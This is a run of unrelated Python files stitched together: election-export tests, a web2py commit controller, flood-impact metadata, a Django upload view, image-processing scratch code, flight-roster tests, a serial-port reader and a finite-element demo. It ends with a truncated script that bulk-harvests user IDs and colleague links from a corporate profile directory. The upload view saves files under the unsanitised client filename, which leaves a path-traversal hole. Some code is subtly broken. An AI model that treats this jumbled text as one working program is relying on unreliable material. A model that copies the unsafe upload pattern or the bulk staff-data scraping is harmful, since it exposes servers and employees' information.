        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 5).value), '1')
        self.assertEqual(str(ws.cell(16, 5).value), '1')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 5).value), '1')
        self.assertEqual(str(ws.cell(23, 5).value), '1')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

    def test_get_election0_xlsx(self):
        response = self.client.get(
            reverse('results-export'),
            { 'election': str(Election.objects.get(name='Election 0').id) }
        )

        self.assertEqual(response.status_code, 200)        

        self.assertEqual(
            response['Content-Disposition'],
            'attachment; filename="Election 0 Results.xlsx"'
        )

        wb = openpyxl.load_workbook(io.BytesIO(response.content))

        self.assertEqual(len(wb.worksheets), 1)

        # Check first worksheet.
        ws = wb.worksheets[0]

        self.assertEqual(wb.sheetnames[0], 'Election 0')

        row_count = ws.max_row
        col_count = ws.max_column
        self.assertEqual(row_count, 25)
        self.assertEqual(col_count, 5)

        self.assertEqual(str(ws.cell(1, 1).value), 'Election 0 Results')

        self.assertEqual(str(ws.cell(2, 1).value), 'Candidates')

        cellContents = [
            'Position 0',
            'Party 0',
            '0, 0',
            'Party 1',
            '3, 3',
            'Party 2',
            'None',
            'Position 1',
            'Party 0',
            '1, 1',
            'Party 1',
            '4, 4',
            'Party 2',
            'None',
            'Position 2',
            'Party 0',
            '2, 2',
            'Party 1',
            '5, 5',
            'Party 2',
            'None'
        ]
        for cellIndex, content in enumerate(cellContents, 5):
            self.assertEqual(str(ws.cell(cellIndex, 1).value), content) 

        self.assertEqual(str(ws.cell(2, 2).value), 'Number of Votes')

        self.assertEqual(str(ws.cell(3, 2).value), '0')

        self.assertEqual(str(ws.cell(4, 2).value), '0') # Section

        self.assertEqual(str(ws.cell(7, 2).value), '1')
        self.assertEqual(str(ws.cell(9, 2).value), '0')
        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 2).value), '2')
        self.assertEqual(str(ws.cell(16, 2).value), '0')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 2).value), '0')
        self.assertEqual(str(ws.cell(23, 2).value), '0')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

        self.assertEqual(str(ws.cell(4, 3).value), '1') # Section

        self.assertEqual(str(ws.cell(7, 3).value), '0')
        self.assertEqual(str(ws.cell(9, 3).value), '1')
        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 3).value), '0')
        self.assertEqual(str(ws.cell(16, 3).value), '0')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 3).value), '1')
        self.assertEqual(str(ws.cell(23, 3).value), '0')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

        self.assertEqual(str(ws.cell(3, 4).value), '1')

        self.assertEqual(str(ws.cell(4, 4).value), '2') # Section

        self.assertEqual(str(ws.cell(7, 4).value), '0')
        self.assertEqual(str(ws.cell(9, 4).value), '0')
        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 4).value), '0')
        self.assertEqual(str(ws.cell(16, 4).value), '1')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 4).value), '0')
        self.assertEqual(str(ws.cell(23, 4).value), '1')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

        self.assertEqual(str(ws.cell(3, 5).value), 'Total Votes')
        self.assertEqual(str(ws.cell(7, 5).value), '1')
        self.assertEqual(str(ws.cell(9, 5).value), '1')
        self.assertEqual(str(ws.cell(11, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(14, 5).value), '2')
        self.assertEqual(str(ws.cell(16, 5).value), '1')
        self.assertEqual(str(ws.cell(18, 2).value), 'N/A')
        self.assertEqual(str(ws.cell(21, 5).value), '1')
        self.assertEqual(str(ws.cell(23, 5).value), '1')
        self.assertEqual(str(ws.cell(25, 2).value), 'N/A')

    def test_get_with_invalid_election_id_non_existent_election_id(self):
        response = self.client.get(
            reverse('results-export'),
            { 'election': '69' },
            HTTP_REFERER=reverse('results'),
            follow=True
        )

        messages = list(response.context['messages'])
        self.assertEqual(
            messages[0].message,
            'You specified an ID for a non-existent election.'
        )
        self.assertRedirects(response, reverse('results'))

    def test_get_with_invalid_election_id_non_integer_election_id(self):
        response = self.client.get(
            reverse('results-export'),
            { 'election': 'hey' },
            HTTP_REFERER=reverse('results'),
            follow=True
        )

        messages = list(response.context['messages'])
        self.assertEqual(
            messages[0].message,
            'You specified a non-integer election ID.'
        )
        self.assertRedirects(response, reverse('results'))

    def test_ref_get_with_invalid_election_id_non_existent_election_id(self):
        response = self.client.get(
            reverse('results-export'),
            { 'election': '69' },
            HTTP_REFERER=reverse('results'),
            follow=True
        )

        messages = list(response.context['messages'])
        self.assertEqual(
            messages[0].message,
            'You specified an ID for a non-existent election.'
        )
        self.assertRedirects(response, reverse('results'))

    def test_ref_get_with_invalid_election_id_non_integer_election_id(self):
        response = self.client.get(
            reverse('results-export'),
            { 'election': 'hey' },
            HTTP_REFERER=reverse('results'),
            follow=True
        )

        messages = list(response.context['messages'])
        self.assertEqual(
            messages[0].message,
            'You specified a non-integer election ID.'
        )
        self.assertRedirects(response, reverse('results'))


from mercurial import cmdutil


_hgignore_content = """\
syntax: glob
*~
*.pyc
*.pyo
*.bak
cache/*
databases/*
sessions/*
errors/*
"""

def commit():

    app = request.args[0]
    path = apath(app, r=request)

    uio = ui.ui()
    uio.quiet = True
    if not os.environ.get('HGUSER') and not uio.config("ui", "username"):
        os.environ['HGUSER'] = 'web2py@localhost'
    try:
        r = hg.repository(ui=uio, path=path)
    except:
        r = hg.repository(ui=uio, path=path, create=True)
    hgignore = os.path.join(path, '.hgignore')
    if not os.path.exists(hgignore):
        open(hgignore, 'w').write(_hgignore_content)
    form = FORM('Comment:',INPUT(_name='comment',requires=IS_NOT_EMPTY()),
                INPUT(_type='submit',_value='Commit'))
    if form.accepts(request.vars,session):
        oldid = r[r.lookup('.')]
        cmdutil.addremove(r)
        r.commit(text=form.vars.comment)
        if r[r.lookup('.')] == oldid:
            response.flash = 'no changes' 
    files = r[r.lookup('.')].files()
    return dict(form=form,files=TABLE(*[TR(file) for file in files]),repo=r)

# coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Flood Raster Impact on
Population.

Contact : ole.moller.nielsen@gmail.com

.. note:: This program is free software; you can redistribute it and/or modify
     it under the terms of the GNU General Public License as published by
     the Free Software Foundation; either version 2 of the License, or
     (at your option) any later version.

"""

__author__ = 'Rizky Maulana Nugraha'

from safe.common.utilities import OrderedDict

from safe.defaults import (
    default_minimum_needs,
    default_gender_postprocessor,
    age_postprocessor,
    minimum_needs_selector)
from safe.impact_functions.impact_function_metadata import \
    ImpactFunctionMetadata
from safe.utilities.i18n import tr
from safe.definitions import (
    layer_mode_continuous,
    layer_geometry_raster,
    hazard_flood,
    hazard_category_single_event,
    unit_metres,
    unit_feet,
    count_exposure_unit,
    exposure_population
)


class FloodEvacuationRasterHazardMetadata(ImpactFunctionMetadata):
    """Metadata for FloodEvacuationFunction.

    .. versionadded:: 2.1

    We only need to re-implement as_dict(), all other behaviours
    are inherited from the abstract base class.
    """

    @staticmethod
    def as_dict():
        """Return metadata as a dictionary.

        This is a static method. You can use it to get the metadata in
        dictionary format for an impact function.

        :returns: A dictionary representing all the metadata for the
            concrete impact function.
        :rtype: dict
        """
        dict_meta = {
            'id': 'FloodEvacuationRasterHazardFunction',
            'name': tr('Raster flood on population'),
            'impact': tr('Need evacuation'),
            'title': tr('Need evacuation'),
            'function_type': 'old-style',
            'author': 'AIFDR',
            'date_implemented': 'N/A',
            'overview': tr(
                'To assess the impacts of flood inundation in raster '
                'format on population.'),
            'detailed_description': tr(
                'The population subject to inundation exceeding a '
                'threshold (default 1m) is calculated and returned as a '
                'raster layer. In addition the total number of affected '
                'people and the required needs based on the user '
                'defined minimum needs are reported. The threshold can be '
                'changed and even contain multiple numbers in which case '
                'evacuation and needs are calculated using the largest number '
                'with population breakdowns provided for the smaller numbers. '
                'The population raster is resampled to the resolution of the '
                'hazard raster and is rescaled so that the resampled '
                'population counts reflect estimates of population count '
                'per resampled cell. The resulting impact layer has the '
                'same resolution and reflects population count per cell '
                'which are affected by inundation.'),
            'hazard_input': tr(
                'A hazard raster layer where each cell represents flood '
                'depth (in meters).'),
            'exposure_input': tr(
                'An exposure raster layer where each cell represent '
                'population count.'),
            'output': tr(
                'Raster layer contains people affected and the minimum '
                'needs based on the people affected.'),
            'actions': tr(
                'Provide details about how many people would likely need '
                'to be evacuated, where they are located and what '
                'resources would be required to support them.'),
            'limitations': [
                tr('The default threshold of 1 meter was selected based '
                   'on consensus, not hard evidence.')
            ],
            'citations': [],
            'layer_requirements': {
                'hazard': {
                    'layer_mode': layer_mode_continuous,
                    'layer_geometries': [layer_geometry_raster],
                    'hazard_categories': [hazard_category_single_event],
                    'hazard_types': [hazard_flood],
                    'continuous_hazard_units': [unit_feet, unit_metres],
                    'vector_hazard_classifications': [],
                    'raster_hazard_classifications': [],
                    'additional_keywords': []
                },
                'exposure': {
                    'layer_mode': layer_mode_continuous,
                    'layer_geometries': [layer_geometry_raster],
                    'exposure_types': [exposure_population],
                    'exposure_units': [count_exposure_unit],
                    'exposure_class_fields': [],
                    'additional_keywords': []
                }
            },
            'parameters': OrderedDict([
                ('thresholds [m]', [1.0]),
                ('postprocessors', OrderedDict([
                    ('Gender', default_gender_postprocessor()),
                    ('Age', age_postprocessor()),
                    ('MinimumNeeds', minimum_needs_selector()),
                ])),
                ('minimum needs', default_minimum_needs())
            ])
        }
        return dict_meta

# -*- coding: utf-8 -*-
from django.shortcuts import render
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib.auth.decorators import login_required


def centres(request):
	#Python练习项目管理中心Center
	return render(request, 'centres/centres.html')

def upload(request):
	#文件上传
	return render(request, 'centres/upload.html')


def uploadfile(request):  
	import os
	if request.method == "POST":    # 请求方法为POST时，进行处理  
		myFile =request.FILES.get("myfile", None)    # 获取上传的文件，如果没有文件，则默认为None  
		if not myFile: 		
			#return HttpResponse("no files for upload!")
			return render(request, 'centres/upload.html',{'what':'no file for upload!'})
		upfile = open(os.path.join("D:\\xHome\\data\\upload",myFile.name),'wb+')    # 打开特定的文件进行二进制的写操作  
		for chunk in myFile.chunks():      # 分块写入文件  
			upfile.write(chunk)  
		upfile.close()  
		#return HttpResponse("upload over!")
		return render(request, 'centres/upload.html', {'what':'upload over!'})
import cv2
import numpy as np
np.set_printoptions(threshold=np.nan)
import util as util
import edge_detect
import lineseg
import drawedgelist

# img = cv2.imread("img/Slide2.jpg", 0)
img = cv2.imread("unsorted/Unit Tests/lambda.png", 0)
im_size = img.shape
returnedCanny = cv2.Canny(img, 50, 150, apertureSize = 3)

cv2.imshow("newcanny", returnedCanny)

skel_dst = util.morpho(returnedCanny)
out = edge_detect.mask_contours(edge_detect.create_img(skel_dst))




res = []
# print(np.squeeze(out[0]))
# print(out[0][0])
for i in range(len(out)):
    # Add the first point to the end so the shape closes
    current = np.squeeze(out[i])
    # print('current', current)
    # print('first', out[i][0])
    if current.shape[0] > 2:
        # res.append(np.concatenate((current, out[i][0])))
        # print(res[-1])
        res.append(current)
    # print(np.concatenate((np.squeeze(out[i]), out[i][0])))

res = np.array(res)
util.sqz_contours(res)

res = lineseg.lineseg(np.array([res[1]]), tol=5)
print(res, "res")
"""
for x in range(len(res)):
    for y in range(lan ):
"""

drawedgelist.drawedgelist(res, img)




"""

seglist = []
for i in range(res.shape[0]):
    # print('shape', res[i].shape)
    if res[i].shape[0] > 2:
        # print(res[i])
        # print(res[i][0])
        seglist.append(np.concatenate((res[i], [res[i][0]])))
    else:
        seglist.append(res[i])

seglist = np.array(seglist)


"""
#print(seglist, "seglist")
#print(len(seglist), "seglist len")
#print(seglist.shape, "seglistshape")
#drawedgelist.drawedgelist(seglist)

"""
# ******* SECTION 2 *******
# SEGMENT AND LABEL THE CURVATURE LINES (CONVEX/CONCAVE).
LineFeature, ListPoint = Lseg_to_Lfeat_v4.create_linefeatures(seglist, res, im_size)
Line_new, ListPoint_new, line_merged = merge_lines_v4.merge_lines(LineFeature, ListPoint, 10, im_size)

#print(Line_new, "line new")
print(len(Line_new), "len line new")
util.draw_lf(Line_new, blank_image)

line_newC = LabelLineCurveFeature_v4.classify_curves(img, Line_new, ListPoint_new, 11)"""
#!/usr/bin/env python

# setup of the grid parameters

# default queue used for training
training_queue = { 'queue':'q1dm', 'memfree':'16G', 'pe_opt':'pe_mth 2', 'hvmem':'8G', 'io_big':True }

# the queue that is used solely for the final ISV training step
isv_training_queue = { 'queue':'q1wm', 'memfree':'32G', 'pe_opt':'pe_mth 4', 'hvmem':'8G' }

# number of audio files that one job should preprocess
number_of_audio_files_per_job = 1000
preprocessing_queue = {}

# number of features that one job should extract
number_of_features_per_job = 600
extraction_queue = { 'queue':'q1d', 'memfree':'8G' }

# number of features that one job should project
number_of_projections_per_job = 600
projection_queue = { 'queue':'q1d', 'hvmem':'8G', 'memfree':'8G' }

# number of models that one job should enroll
number_of_models_per_enrol_job = 20
enrol_queue = { 'queue':'q1d', 'memfree':'4G', 'io_big':True }

# number of models that one score job should process
number_of_models_per_score_job = 20
score_queue = { 'queue':'q1d', 'memfree':'4G', 'io_big':True }

grid_type = 'local' # on Idiap grid

#!/usr/bin/python2
# -*- coding: utf-8 -*-
# coding=utf-8

import unittest
from datetime import datetime

from lib.escala import Escala
import dirs

dirs.DEFAULT_DIR = dirs.TestDir()


class FrameTest(unittest.TestCase):

    def setUp(self):
        self.escala = Escala('fixtures/escala.xml')
        self.dir = dirs.TestDir()
        self.maxDiff = None

    def tearDown(self):
        pass

    def test_attributos_voo_1(self):
        p_voo = self.escala.escalas[0]

        self.assertEqual(p_voo.activity_date, datetime(2013, 3, 1, 11, 36))
        self.assertEqual(p_voo.present_location, 'VCP')
        self.assertEqual(p_voo.flight_no, '4148')
        self.assertEqual(p_voo.origin, 'VCP')
        self.assertEqual(p_voo.destination, 'GYN')
        self.assertEqual(p_voo.actype, 'E95')
        self.assertTrue(p_voo.checkin)
        self.assertEqual(p_voo.checkin_time, datetime(2013, 3, 1, 10, 36))
        self.assertEqual(p_voo.std, datetime(2013, 3, 1, 13, 13))
        self.assertEqual(p_voo.sta, datetime(2013, 3, 1, 11, 36))
        self.assertEqual(p_voo.activity_info, 'AD4148')
        self.assertFalse(p_voo.duty_design)

    def test_attributos_voo_17(self):
        p_voo = self.escala.escalas[17]

        self.assertEqual(p_voo.activity_date, datetime(2013, 10, 28, 3, 0))
        self.assertEqual(p_voo.present_location, 'VCP')
        self.assertEqual(p_voo.flight_no, None)
        self.assertEqual(p_voo.origin, 'VCP')
        self.assertEqual(p_voo.destination, 'VCP')
        self.assertEqual(p_voo.activity_info, 'P04')
        self.assertEqual(p_voo.actype, None)
        self.assertEqual(p_voo.sta, datetime(2013, 10, 28, 3, 0))
        self.assertEqual(p_voo.std, datetime(2013, 10, 28, 15, 0))
        self.assertFalse(p_voo.checkin)
        self.assertEqual(p_voo.checkin_time, None)
        self.assertFalse(p_voo.duty_design)

    def test_attributos_voo_18(self):
        p_voo = self.escala.escalas[18]

        self.assertEqual(p_voo.activity_date, datetime(2013, 10, 29, 4, 58))
        self.assertEqual(p_voo.present_location, 'VCP')
        self.assertEqual(p_voo.flight_no, '4050')
        self.assertEqual(p_voo.origin, 'VCP')
        self.assertEqual(p_voo.destination, 'FLN')
        self.assertEqual(p_voo.activity_info, 'AD4050')
        self.assertEqual(p_voo.actype, 'E95')
        self.assertEqual(p_voo.sta, datetime(2013, 10, 29, 4, 58))
        self.assertEqual(p_voo.std, datetime(2013, 10, 29, 6, 15))
        self.assertTrue(p_voo.checkin)
        self.assertEqual(p_voo.checkin_time, datetime(2013, 10, 29, 5, 8))
        self.assertFalse(p_voo.duty_design)
        self.assertEqual(p_voo.horas_de_voo, '1:17')

    def test_attributos_quarto_voo(self):
        p_voo = self.escala.escalas[25]
        self.assertFalse(p_voo.checkin)
        self.assertEqual(p_voo.checkin_time, None)
        self.assertEqual(p_voo.flight_no, '2872')
        self.assertEqual(p_voo.activity_info, 'AD2872')

    def test_calculo_horas_voadas(self):
        s_horas = {
            'h_diurno': '6:40',
            'h_noturno': '6:47',
            'h_total_voo': '13:27',
            'h_faixa2': '0:00',
            'h_sobreaviso': '40:00',
            'h_reserva': '29:13'
        }
        self.assertEqual(self.escala.soma_horas(), s_horas)

    def test_ics(self):
        """
        Check ICS output
        """
        escala = Escala('fixtures/escala_ics.xml')
        f_result = open(self.dir.get_data_dir() + 'fixtures/escala.ics')
        self.assertEqual(escala.ics(), f_result.read())
        f_result.close()

    def test_csv(self):
        """
        Check CSV output
        """
        f_result = open(self.dir.get_data_dir() + 'fixtures/escala.csv')

        self.assertEqual(self.escala.csv(), f_result.read())
        f_result.close()


def main():
    unittest.main()


if __name__ == '__main__':
    main()

from test_support import *

# this test calls a prover which is correctly configured but whose execution
# gives an error (here: the prover executable doesn't exist). The intent is to
# test the output of gnatprove in this specific case

prove_all(prover=["plop"], opt=["--why3-conf=test.conf"])


from itertools import combinations
 
def is_good(n):

    return 1 + ((int(n) - 1) % 9) == 9
 
 
def generate_subsequences(n):
    subsequences = []
    combinations_list = []
    index = 4
#Generate all combinations
    while index > 0:
        combinations_list.append(list(combinations(str(n), index)))
        index -= 1
#Formatting combinations
    for index in combinations_list:
        for combination in index:
            subsequences.append(''.join(combination))
    return subsequences
 
 
if __name__ == '__main__':
#The modulo
    modulo = ((10 ** 9) + 7)
#Get number of cases
    cases = int(raw_input())
    while cases > 0:
        value = raw_input()
        good_subsequences = 0
        for sub in generate_subsequences(value):
            if is_good(sub):
                good_subsequences += 1
        print (good_subsequences % modulo)-1
        cases -= 1 

#coding=utf-8

import unittest
import HTMLTestRunner
import time
from config import globalparam
from public.common import sendmail

def run():
    test_dir = './testcase'
    suite = unittest.defaultTestLoader.discover(start_dir=test_dir,pattern='test*.py')

    now = time.strftime('%Y-%m-%d_%H_%M_%S')
    reportname = globalparam.report_path + '\\' + 'TestResult' + now + '.html'
    with open(reportname,'wb') as f:
        runner = HTMLTestRunner.HTMLTestRunner(
            stream=f,
            title='测试报告',
            description='Test the import testcase'
        )
        runner.run(suite)
    time.sleep(3)
    # 发送邮件
    mail = sendmail.SendMail()
    mail.send()

if __name__=='__main__':
    run()
# -*- coding: utf-8 -*-

from pyload.plugin.internal.DeadCrypter import DeadCrypter


class FiredriveCom(DeadCrypter):
    __name    = "FiredriveCom"
    __type    = "crypter"
    __version = "0.03"

    __pattern = r'https?://(?:www\.)?(firedrive|putlocker)\.com/share/.+'
    __config  = []  #@TODO: Remove in 0.4.10

    __description = """Firedrive.com folder decrypter plugin"""
    __license     = "GPLv3"
    __authors     = [("Walter Purcaro", "vuolter@gmail.com")]

import queue
import logging
import platform
import threading

import datetime as dt
import serial
import serial.threaded
import serial_device

from .or_event import OrEvent

logger = logging.getLogger(__name__)


# Flag to indicate whether queues should be polled.
# XXX Note that polling performance may vary by platform.
POLL_QUEUES = (platform.system() == 'Windows')


class EventProtocol(serial.threaded.Protocol):
    def __init__(self):
        self.transport = None
        self.connected = threading.Event()
        self.disconnected = threading.Event()
        self.port = None

    def connection_made(self, transport):
        """Called when reader thread is started"""
        self.port = transport.serial.port
        logger.debug('connection_made: `%s` `%s`', self.port, transport)
        self.transport = transport
        self.connected.set()
        self.disconnected.clear()

    def data_received(self, data):
        """Called with snippets received from the serial port"""
        raise NotImplementedError

    def connection_lost(self, exception):
        """\
        Called when the serial port is closed or the reader loop terminated
        otherwise.
        """
        if isinstance(exception, Exception):
            logger.debug('Connection to port `%s` lost: %s', self.port,
                         exception)
        else:
            logger.debug('Connection to port `%s` closed', self.port)
        self.connected.clear()
        self.disconnected.set()


class KeepAliveReader(threading.Thread):
    '''
    Keep a serial connection alive (as much as possible).

    Parameters
    ----------
    state : dict
        State dictionary to share ``protocol`` object reference.
    comport : str
        Name of com port to connect to.
    default_timeout_s : float, optional
        Default time to wait for serial operation (e.g., connect).

        By default, block (i.e., no time out).
    **kwargs
        Keyword arguments passed to ``serial_for_url`` function, e.g.,
        ``baudrate``, etc.
    '''
    def __init__(self, protocol_class, comport, **kwargs):
        super(KeepAliveReader, self).__init__()
        self.daemon = True
        self.protocol_class = protocol_class
        self.comport = comport
        self.kwargs = kwargs
        self.protocol = None
        self.default_timeout_s = kwargs.pop('default_timeout_s', None)

        # Event to indicate serial connection has been established.
        self.connected = threading.Event()
        # Event to request a break from the run loop.
        self.close_request = threading.Event()
        # Event to indicate thread has been closed.
        self.closed = threading.Event()
        # Event to indicate an exception has occurred.
        self.error = threading.Event()
        # Event to indicate that the thread has connected to the specified port
        # **at least once**.
        self.has_connected = threading.Event()

    @property
    def alive(self):
        return not self.closed.is_set()

    def run(self):
        # Verify requested serial port is available.
        try:
            if self.comport not in (serial_device
                                    .comports(only_available=True).index):
                raise NameError('Port `%s` not available.  Available ports: '
                                '`%s`' % (self.comport,
                                          ', '.join(serial_device.comports()
                                                    .index)))
        except NameError as exception:
            self.error.exception = exception
            self.error.set()
            self.closed.set()
            return

        while True:
            # Wait for requested serial port to become available.
            while self.comport not in (serial_device
                                       .comports(only_available=True).index):
                # Assume serial port was disconnected temporarily.  Wait and
                # periodically check again.
                self.close_request.wait(2)
                if self.close_request.is_set():
                    # No connection is open, so nothing to close.  Just quit.
                    self.closed.set()
                    return
            try:
                # Try to open serial device and monitor connection status.
                logger.debug('Open `%s` and monitor connection status',
                             self.comport)
                device = serial.serial_for_url(self.comport, **self.kwargs)
            except serial.SerialException as exception:
                self.error.exception = exception
                self.error.set()
                self.closed.set()
                return
            except Exception as exception:
                self.error.exception = exception
                self.error.set()
                self.closed.set()
                return
            else:
                with serial.threaded.ReaderThread(device, self
                                                  .protocol_class) as protocol:
                    self.protocol = protocol

                    connected_event = OrEvent(protocol.connected,
                                              self.close_request)
                    disconnected_event = OrEvent(protocol.disconnected,
                                                 self.close_request)

                    # Wait for connection.
                    connected_event.wait(None if self.has_connected.is_set()
                                         else self.default_timeout_s)
                    if self.close_request.is_set():
                        # Quit run loop.  Serial connection will be closed by
                        # `ReaderThread` context manager.
                        self.closed.set()
                        return
                    self.connected.set()
                    self.has_connected.set()
                    # Wait for disconnection.
                    disconnected_event.wait()
                    if self.close_request.is_set():
                        # Quit run loop.
                        self.closed.set()
                        return
                    self.connected.clear()
                    # Loop to try to reconnect to serial device.

    def write(self, data, timeout_s=None):
        '''
        Write to serial port.

        Waits for serial connection to be established before writing.

        Parameters
        ----------
        data : str or bytes
            Data to write to serial port.
        timeout_s : float, optional
            Maximum number of seconds to wait for serial connection to be
            established.

            By default, block until serial connection is ready.
        '''
        self.connected.wait(timeout_s)
        self.protocol.transport.write(data)

    def request(self, response_queue, payload, timeout_s=None,
                poll=POLL_QUEUES):
        '''
        Send

        Parameters
        ----------
        device : serial.Serial
            Serial instance.
        response_queue : Queue.Queue
            Queue to wait for response on.
        payload : str or bytes
            Payload to send.
        timeout_s : float, optional
            Maximum time to wait (in seconds) for response.

            By default, block until response is ready.
        poll : bool, optional
            If ``True``, poll response queue in a busy loop until response is
            ready (or timeout occurs).

            Polling is much more processor intensive, but (at least on Windows)
            results in faster response processing.  On Windows, polling is
            enabled by default.
        '''
        self.connected.wait(timeout_s)
        return request(self, response_queue, payload, timeout_s=timeout_s,
                       poll=poll)

    def close(self):
        self.close_request.set()

    # - -  context manager, returns protocol

    def __enter__(self):
        """\
        Enter context handler. May raise RuntimeError in case the connection
        could not be created.
        """
        self.start()
        # Wait for protocol to connect.
        event = OrEvent(self.connected, self.closed)
        event.wait(self.default_timeout_s)
        return self

    def __exit__(self, *args):
        """Leave context: close port"""
        self.close()
        self.closed.wait()


def request(device, response_queue, payload, timeout_s=None, poll=POLL_QUEUES):
    '''
    Send payload to serial device and wait for response.

    Parameters
    ----------
    device : serial.Serial
        Serial instance.
    response_queue : Queue.Queue
        Queue to wait for response on.
    payload : str or bytes
        Payload to send.
    timeout_s : float, optional
        Maximum time to wait (in seconds) for response.

        By default, block until response is ready.
    poll : bool, optional
        If ``True``, poll response queue in a busy loop until response is
        ready (or timeout occurs).

        Polling is much more processor intensive, but (at least on Windows)
        results in faster response processing.  On Windows, polling is
        enabled by default.
    '''
    device.write(payload)
    if poll:
        # Polling enabled.  Wait for response in busy loop.
        start = dt.datetime.now()
        while not response_queue.qsize():
            if (dt.datetime.now() - start).total_seconds() > timeout_s:
                raise queue.Empty('No response received.')
        return response_queue.get()
    else:
        # Polling disabled.  Use blocking `Queue.get()` method to wait for
        # response.
        return response_queue.get(timeout=timeout_s)

__author__ = "Harish Narayanan"
__copyright__ = "Copyright (C) 2009 Simula Research Laboratory and %s" % __author__
__license__  = "GNU GPL Version 3 or any later version"

from cbc.twist import *
from sys import argv
""" DEMO - Twisting of a hyperelastic cube """

class Twist(StaticHyperelasticity):
    """ Definition of the hyperelastic problem """
    def mesh(self):
        n = 8
        return UnitCubeMesh(n, n, n)

    # Setting up dirichlet conditions and boundaries
    def dirichlet_values(self):
        clamp = Expression(("0.0", "0.0", "0.0"))
        twist = Expression(("0.0",
                            "y0 + (x[1] - y0) * cos(theta) - (x[2] - z0) * sin(theta) - x[1]",
                            "z0 + (x[1] - y0) * sin(theta) + (x[2] - z0) * cos(theta) - x[2]"),
                           y0=0.5, z0=0.5, theta=pi/6)
        return [clamp, twist]

    def dirichlet_boundaries(self):
        left = "x[0] == 0.0"
        right = "x[0] == 1.0"
        return [left, right]


    # List of material models
    def material_model(self):
        # Material parameters can either be numbers or spatially
        # varying fields. For example,
        mu       = 3.8461
        lmbda    = Expression("x[0]*5.8 + (1 - x[0])*5.7")
        C10 = 0.171; C01 = 4.89e-3; C20 = -2.4e-4; C30 = 5.e-4
        delka = 1.0/sqrt(2.0)
        M = Constant((0.0,1.0,0.0))
        k1 = 1e2; k2 = 1e1


        materials = []
        materials.append(MooneyRivlin({'C1':mu/2, 'C2':mu/2, 'bulk':lmbda}))
        materials.append(StVenantKirchhoff({'mu':mu, 'bulk':lmbda}))
        materials.append(neoHookean({'half_nkT':mu, 'bulk':lmbda}))
        materials.append(Isihara({'C10':C10,'C01':C01,'C20':C20,'bulk':lmbda}))
        materials.append(Biderman({'C10':C10,'C01':C01,'C20':C20,'C30':C30,'bulk':lmbda}))
        materials.append(AnisoTest({'mu1':mu,'mu2':2*mu,'M':M,'bulk':lmbda}))
        materials.append(GasserHolzapfelOgden({'mu':mu,'k1':k1,'k2':k2,'M':M,'bulk':lmbda}))
        materials.append(Ogden({'alpha1':1.3,'alpha2':5.0,'alpha3':-2.0,\
                                'mu1':6.3e5,'mu2':0.012e5,'mu3':-0.1e5}))
        
        try:
            index = int(argv[1])
        except:
            index = 2
        print str(materials[index])
        return materials[index]

    def name_method(self, method):
        self.method = method

    def __str__(self):
        return "A hyperelastic cube twisted by 30 degrees solved by " + self.method



# Setup the problem

twist = Twist()
twist.name_method("DISPLACEMENT BASED FORMULATION")


# Solve the problem
print twist
twist.solve()

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# dépendances
import requests
import xml.dom.minidom
import sys
import signal
import os
import getopt
from queue import Queue
from threading import Thread
import time

class SetQueue(Queue):

    def _init(self, maxsize):
        Queue._init(self, maxsize) 
        self.all_items = set()

    def _put(self, item):
        if item not in self.all_items:
            Queue._put(self, item) 
            self.all_items.add(item)

def signal_handler(signal, frame):
	print('You pressed Ctrl+C!')
	sys.exit(0)

def usage():
	"""usage de la ligne de commande"""
	print ("usage : " + sys.argv[0] + "-h --help -s --server someurl.com -u --user login -p --password password")

def getAtomFeed(url, login, pwd):
	# var
	MAX_TRY = 10
	essai = 0

	# get atom document
	while essai < MAX_TRY:
		try:
			r = requests.get('http://' + url, auth=(login,pwd), timeout=10)
		except:
			essai += 1
			continue
		break
	else:
		raise ('Erreur lors de la requête')

	# parse atom document
	try:
		dom = xml.dom.minidom.parseString(r.text)
	except:
		raise ('Erreur lors du parsing du document Atom')

	return dom

def getManagerInfo(atomFeed):
	try:
		entries = atomFeed.getElementsByTagName('entry')[1]
	except:
		return None
	try:
		managerId = entries.getElementsByTagName('snx:userid')[0]
		return managerId.firstChild.data
	except:
		return None

def buildUrlSearchList(server, login, pwd, q):
	# var
	alphabet = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
	#alphabet = ['a']
	for i in alphabet:
		url = server + '/profiles/atom/search.do?search=' + i + '*&ps=250'
		dom = getAtomFeed(url, login, pwd)
		totalResult = dom.getElementsByTagName('opensearch:totalResults')[0]
		totalResult = int(totalResult.firstChild.data)
		if totalResult > 250:
			nbPage = int(float(totalResult) / 250) + 1
			for n in range(1,nbPage,1):
				item = url + "&page=" + str(n) 
				q.put(item)
		else:
			nbPage = 1
			q.put(url)

def getUserIdsWorker(login, pwd, qin, qout):
	while True:
		url = qin.get()
		if url == None:
			break
		qin.task_done()
		try:
			dom = getAtomFeed(url, login, pwd)
		except:
			continue
		userIds = dom.getElementsByTagName('snx:userid')
		for index, item, in enumerate(userIds):
			qout.put(item.firstChild.data)


def getRelationsWorker(server, login, pwd, qin, qout, getManager, qmgmt):
	while True:
		userid = qin.get()
		if userid == None:
			break
		qin.task_done()
		url = server + '/profiles/atom/connections.do?userid=' + userid + '&connectionType=colleague&ps=250'
		try:
			dom = getAtomFeed(url, login, pwd)
		except:
			continue
		feed = dom.firstChild
		entries = feed.getElementsByTagName('entry')
		for entry in entries:
